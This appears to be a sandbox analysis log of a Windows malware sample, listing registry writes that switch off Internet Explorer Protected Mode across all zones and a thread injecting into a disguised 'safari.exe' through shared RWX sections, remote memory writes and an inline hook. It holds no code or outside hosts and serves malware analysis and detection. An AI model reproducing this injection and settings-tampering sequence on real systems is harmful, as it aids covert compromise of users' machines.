| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\, value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 |
Thread 0xf88
212
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Process | Open | desired_access = PROCESS_CREATE_THREAD, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x765b9f10 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x765b9f10 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateSection, address_out = 0x779d7140 |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE_READWRITE, maximum_size = 47251084 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtMapViewOfSection, address_out = 0x779d6f20 |
|
1 | |
| Module | Map | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2bb0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtMapViewOfSection, address_out = 0x779d6f20 |
|
1 | |
| Module | Map | process_name = c:\program files (x86)\msecache\safari.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x410000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Wow64EnableWow64FsRedirection, address_out = 0x765db4f0 |
|
1 | |
| File | Create | filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Windows\SYSTEM32\ntdll.dll, size = 4, size_out = 4 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| File | Create | filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Windows\SYSTEM32\ntdll.dll, size = 4, size_out = 4 |
|
1 | |
| Module | Get Filename | module_name = c:\windows\syswow64\ntdll.dll, process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 |
|
1 | |
| File | Create | filename = C:\Windows\SYSTEM32\ntdll.dll, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Windows\SYSTEM32\ntdll.dll, size = 4, size_out = 4 |
|
1 | |
| Memory | Allocate | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READ, size = 56 |
|
1 | |
| Memory | Allocate | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x510000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READ, size = 5 |
|
1 | |
| Memory | Protect | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x510000, protection = PAGE_EXECUTE_READWRITE, size = 5 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x510000, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x510001, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x510002, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x510003, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x510004, size = 1 |
|
1 | |
| Memory | Protect | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x510000, protection = PAGE_EXECUTE_READ, size = 5 |
|
1 | |
| Memory | Protect | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500000, protection = PAGE_EXECUTE_READWRITE, size = 61 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500000, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500001, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500002, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500003, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500004, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500005, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500006, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500007, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500008, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500009, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50000a, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50000b, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50000c, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50000d, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50000e, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50000f, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500010, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500011, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500012, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500013, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500014, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500015, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500016, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500017, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500018, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500019, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50001a, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50001b, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50001c, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50001d, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50001e, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50001f, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500020, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500021, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500022, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500023, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500024, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500025, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500026, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500027, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500028, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500029, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50002a, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50002b, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50002c, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50002d, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50002e, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50002f, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500030, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500031, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500032, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500033, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500034, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500035, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500036, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500037, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500038, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x500039, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50003a, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50003b, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x50003c, size = 1 |
|
1 | |
| Memory | Protect | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b0, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b0, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b1, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b2, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b3, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b4, size = 1 |
|
1 | |
| Memory | Protect | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x7782d9b0, protection = PAGE_EXECUTE_READ, size = 1024 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtUnmapViewOfSection, address_out = 0x779d6f40 |
|
1 | |
| Module | Unmap | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
1 | |
| System | Sleep | duration = 100 milliseconds (0.100 seconds) |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateSection, address_out = 0x779d7140 |
|
1 | |
| Module | Create Mapping | protection = PAGE_EXECUTE_READWRITE, maximum_size = 47251084 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtMapViewOfSection, address_out = 0x779d6f20 |
|
1 | |
| Module | Map | process_name = c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2bb0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtMapViewOfSection, address_out = 0x779d6f20 |
|
1 | |
| Module | Map | process_name = c:\program files (x86)\msecache\safari.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x520000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlNtStatusToDosError, address_out = 0x779b83c0 |
|
1 | |
| Memory | Allocate | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READ, size = 56 |
|
1 | |
| Memory | Allocate | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x710000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READ, size = 5 |
|
1 | |
| Memory | Protect | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x710000, protection = PAGE_EXECUTE_READWRITE, size = 5 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x710000, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x710001, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x710002, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x710003, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x710004, size = 1 |
|
1 | |
| Memory | Protect | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x710000, protection = PAGE_EXECUTE_READ, size = 5 |
|
1 | |
| Memory | Protect | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700000, protection = PAGE_EXECUTE_READWRITE, size = 61 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700000, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700001, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700002, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700003, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700004, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700005, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700006, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700007, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700008, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700009, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70000a, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70000b, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70000c, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70000d, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70000e, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70000f, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700010, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700011, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700012, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700013, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700014, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700015, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700016, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700017, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700018, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x700019, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70001a, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70001b, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70001c, size = 1 |
|
1 | |
| Memory | Write | process_name = c:\program files (x86)\msecache\safari.exe, address = 0x70001d, size = 1 |
|
1 | |
